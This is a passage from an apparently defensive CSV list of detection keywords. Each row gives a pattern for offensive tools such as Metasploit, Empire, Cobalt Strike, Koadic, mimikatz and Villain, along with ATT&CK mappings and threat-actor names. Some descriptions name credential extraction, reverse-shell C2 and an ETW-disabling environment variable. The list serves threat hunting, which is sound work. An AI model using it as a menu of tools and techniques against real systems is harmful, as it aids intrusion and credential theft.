security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_domain_info.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*enum_firefox.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_hostfile.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_logged_on_users*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_logged_on_users.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_mikrotik.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_ms_product_keys.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_printers.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*enum_shares.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*enum_shares.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_vmware.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_vyos.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum4linux*,offensive_tool_keyword,enum4linux,Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ,T1018 - T1087.002 - T1135 - T1049 - T1033,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/CiscoCXSecurity/enum4linux,1,1,N/A,N/A,10,944,228,2023-05-09T22:54:24Z,2015-07-31T21:06:03Z -*enum4linux_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*enum4linux-ng -A -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*EnumCLR.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Enum-Creds*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*enumerate.cna*,offensive_tool_keyword,red-team-scripts,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/threatexpress/red-team-scripts,1,1,N/A,N/A,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*EnumerateAllDomainControllers*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Enumerate-AllHighPrivilegePrincipals*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*EnumerateDomainGpo*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,0,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*Enumerate-MFAStatusOfHighPrivilegePrincipals*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*Enumeration/DesktopACL*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Enumeration\DesktopAC*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*env_var_spoofing_poc.cpp*,offensive_tool_keyword,ETW,stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*eo.oe.kiwi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*eppiocemhmnlbhjplcgkofciiegomcon*,greyware_tool_keyword,Urban Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Erebus/*spacerunner*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*error in libcrypto*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*eRv6yTYhShell*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*ES.Alan.Core/*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*EspressoCake/PPLDump_BOF*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*Eternalblue-*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*EternalBlue.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*eternalblue.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Eternalblue-Doublepulsar*,offensive_tool_keyword,Eternalblue-Doublepulsar-Metasploit,doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. [11],T1055 - T1043 - T1218,TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit,1,1,N/A,N/A,10,1055,545,2021-03-31T09:44:10Z,2017-04-24T12:41:56Z -*EternalHushFramework-*-SNAPSHOT.jar*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*EternalHushFramework-main*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*EternalHushMain.java*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*EternalHushWindow.java*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,1,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*ethereum2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*etw-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*ETWEventSubscription*Program.cs*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*ETWEventSubscription.exe* -ProcStart 